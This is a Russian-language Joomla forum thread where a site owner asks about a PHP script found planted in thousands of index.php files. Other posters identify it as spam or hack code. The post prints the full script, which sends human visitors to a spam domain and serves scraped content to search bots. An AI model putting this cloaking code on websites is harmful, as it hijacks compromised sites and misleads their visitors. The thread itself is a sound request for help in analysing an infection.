0 Пользователей и 1 Гость просматривают эту тему.
  • 9 Ответов
  • 377 Просмотров
*

katalog_2003

  • Захожу иногда
  • 70
  • 0 / 0
не могу понять что за скрипт может кто подскажет  спасибо

<?php


$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']);
if((strpos($tmp, 'bot')!= true)){
header('location:http://deskincream2016.lori-ellis.com/');
exit;
}


function gethttpcnt($url,$username = '',$password = '',$timeout = 10){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$cnt = curl_exec($ch);
curl_close($ch);
return $cnt;
}
 $fromsite="http://www.fitforfun.de/beauty-wellness/haut-haare/pigmentflecken/hautprobleme_aid_5500.html";
 $website="http://www.fitforfun.de/";

 $ss=$_SERVER['PHP_SELF'];
 $ss=str_replace("index.php","",$ss);
 $otherstring=$fromsite;
 
 $content=gethttpcnt($otherstring);
 $content=str_replace("\"images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"/includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"../includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"min/","\"" . $website . "min/",$content);
 $content=str_replace("\"media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"/css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"../css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../js/","\"" . $website . "/images/",$content);
 $content=str_replace("'images/","'" . $website . "/images/",$content);
 $content=str_replace("'/images/","'" . $website . "/images/",$content);
 $content=str_replace("'../images/","'" . $website . "/images/",$content);
 $content=str_replace("'Images/","'" . $website . "/images/",$content);
 $content=str_replace("'/Images/","'" . $website . "/images/",$content);
 $content=str_replace("'../Images/","'" . $website . "/images/",$content);
 $content=str_replace("'includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'/includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'../includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'min/","'" . $website . "min/",$content);
 $content=str_replace("'media/","'" . $website . "/images/",$content);
 $content=str_replace("'/media/","'" . $website . "/images/",$content);
 $content=str_replace("'../media/","'" . $website . "/images/",$content);
 $content=str_replace("'skin/","'" . $website . "/images/",$content);
 $content=str_replace("'/skin/","'" . $website . "/images/",$content);
 $content=str_replace("'../skin/","'" . $website . "/images/",$content);
 $content=str_replace("'js/","'" . $website . "/images/",$content);
 $content=str_replace("'/js/","'" . $website . "/images/",$content);
 $content=str_replace("'../js/","'" . $website . "/images/",$content);
 $content=str_replace('href="/','href="' . $website,$content);
 $content=str_replace('"' . $fromsite . '"','"' . $_SERVER['HTTP_HOST'] . $ss . '"',$content);
 $content=str_replace("'" . $fromsite . "'","'" . $_SERVER['HTTP_HOST'] . $ss . "'",$content);
 echo $content;
?>
*

robert

  • Живу я здесь
  • 4493
  • 421 / 16
Вы лучше сначала расскажите, чем этот скрипт вам интересен, потому что, скорее всего, он создан не для благих целей. Он вам как-то вредит или вы хотите его использовать?
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

beliyadm

  • Легенда
  • 8815
  • 1620 / 63
  • Севастополь == Россия
Шаблон качался с варезного ресурса? Вот и скрипт спамерский. Либо просто скрытая реклама либо бекдор глубже лежит
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

draff

  • Живу я здесь
  • 3184
  • 213 / 5
  • Ищу работу
Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В скрипте много вставок на сайты. И другой вопрос- дата создания скрипта, и с каким расширением этот скрипт появился в файлах сайта. Или хакер получил доступ к хостингу - и внедрил этот скрипт.
Удалю вирус, js miner с сайта. Обновление Virtuemart. Тема в коммерческом разделе     |    Отзывы
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

beliyadm

  • Легенда
  • 8815
  • 1620 / 63
  • Севастополь == Россия
Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В бесплатных расширениях реклама открытая, а не укрыта base64 или другими скрытыми способами. Я лично в бесплатных никогда не видел рекламы, кроме ссылки на сайт разработчика.
Все истины, которые я хочу вам изложить, — бесстыдная ложь.
Записки нетрезвого кодера || -=Joomla FAQ=- || -=все плохо=- || skype: beliyadm_pb
*

katalog_2003

  • Захожу иногда
  • 70
  • 0 / 0
Сайт был передан на оптимизацию вскрываю а там папок ba123 и т.д 3500 шт index.php в нутри
*

wishlight

  • Живу я здесь
  • 4024
  • 247 / 1
  • skype aqaus.com
*

katalog_2003

  • Захожу иногда
  • 70
  • 0 / 0
HaCkeD By Dr.Silnt HilL не знаете что это
*

dmitry_stas

  • Легенда
  • 11584
  • 1111 / 7
Явно ничего хорошего. Лечите сайт.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

robert

  • Живу я здесь
  • 4493
  • 421 / 16
HaCkeD By Dr.Silnt HilL не знаете что это
"Доктор Silnt HilL тебя поимел" - что-то вроде этого. Хотя он не такой уж крутой, судя по коду.
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не могу тег прикрепить к меню

Автор HolySong

Ответов: 1
Просмотров: 80
Последний ответ 21.05.2018, 09:13:46
от HolySong
Блок сжимается понять причину

Автор V1RTUS

Ответов: 2
Просмотров: 55
Последний ответ 14.05.2018, 15:22:07
от V1RTUS
Не работает скрипт

Автор scenann

Ответов: 3
Просмотров: 99
Последний ответ 22.04.2018, 22:19:29
от scenann
Не могу убрать index.php в Joomla 3х

Автор DED_Z

Ответов: 23
Просмотров: 3868
Последний ответ 13.04.2018, 00:51:13
от korkka44
Не работает скрипт слайдов

Автор Olga

Ответов: 4
Просмотров: 160
Последний ответ 09.04.2018, 11:05:51
от Olga